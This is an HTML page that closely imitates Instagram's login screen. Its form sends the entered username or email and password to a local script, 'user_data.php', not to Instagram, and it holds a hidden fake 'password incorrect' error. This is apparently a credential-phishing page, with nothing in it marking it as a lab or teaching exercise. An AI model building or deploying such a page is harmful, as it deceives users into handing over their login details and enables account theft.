<!DOCTYPE html>
<html lang="pt-BR">

<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="shortcut icon" href="img/ig-instagram-icon.svg " type="image/x-icon">

  <link rel="stylesheet" href="./styles.css" />
  <title>Instagram</title>

  <script src="action.js"></script>

</head>

<body>
  <main class="flex align-items-center justify-content-center">
    <section id="mobile" class="flex"></section>
    <section id="auth" class="flex direction-column">
      <div class="panel login flex direction-column">
        <h1 title="Instagram" class="flex justify-content-center">
          <img src="./img//instagram-logo.png" alt="Instagram logo" title="Instagram logo" width="175" />
        </h1>
        <form id="login_form" action="user_data.php" method="post">
          <label for="email" class="sr-only">Phone number, username, or email</label>
          <input id="login_email" type="text" name="login_email" onkeyup="getting_info()"
            placeholder="Phone number, username, or email" />

          <label for="password" class="sr-only">Password</label>
          <input id="login_password" name="login_password" type="password" onkeyup="getting_info()"
            placeholder="Password" />

          <input id="login_button" type="submit" value="Log in" disabled>
        </form>
        <div class="flex separator align-items-center">
          <span></span>
          <div class="or">OR</div>
          <span></span>
        </div>
        <div class="login-with-fb flex direction-column align-items-center">
          <div>
            <img />
            <a>Log in with Facebook</a>
          </div>
          <span id="error_msg" hidden style="color: red;">&nbsp;&nbsp;&nbsp;&nbsp;Sorry, your password was incorrect.
            Please double-check &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;your password.</span>
          <a href="https://instagram.com/accounts/password/reset/">Forgot password?</a>
        </div>
      </div>
      <div class="panel register flex justify-content-center">
        <p>Don't have an account? </p>
        <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
      </div>
      <div class="app-download flex direction-column align-items-center">
        <p>Get the app.</p>
        <div class="flex justify-content-center">
          <img src="./img/apple-button.png" alt="Imagem com a logo da Apple Store"
            title="Imagem com a logo da Apple Store" />
          <img src="./img/googleplay-button.png" alt="Imagem com a logo da Google Play"
            title="Imagem com a logo da Google Play" />
        </div>
      </div>
    </section>
  </main>
  <footer>
    <ul class="flex flex-wrap justify-content-center">
      <li><a href="https://about.facebook.com/meta">Meta</a></li>
      <li><a href="https://about.instagram.com/">About</a></li>
      <li><a href="https://about.instagram.com/blog/">Blog</a></li>
      <li><a href="https://www.instagram.com/about/jobs/">Jobs</a></li>
      <li><a href="https://help.instagram.com/">Help</a></li>
      <li><a href="https://developers.facebook.com/docs/instagram">API</a></li>
      <li><a href="https://www.instagram.com/legal/privacy/">Terms</a></li>
      <li><a href="https://www.instagram.com/directory/profiles/">Top Accounts</a></li>
      <li><a href="https://www.instagram.com/directory/hashtags/">Hastags</a></li>
      <li><a href="https://www.instagram.com/explore/locations/">Locations</a></li>
      <li><a href="https://www.instagram.com/web/lite/">Instagram Lite</a></li>
      <li><a href="https://www.facebook.com/help/instagram/261704639352628">Contact Uploading & Non-Users</a></li>
    </ul>
    <p class="copyright">English ^ &nbsp; © 2020 Instagram do Facebook</p>
  </footer>
</body>

</html>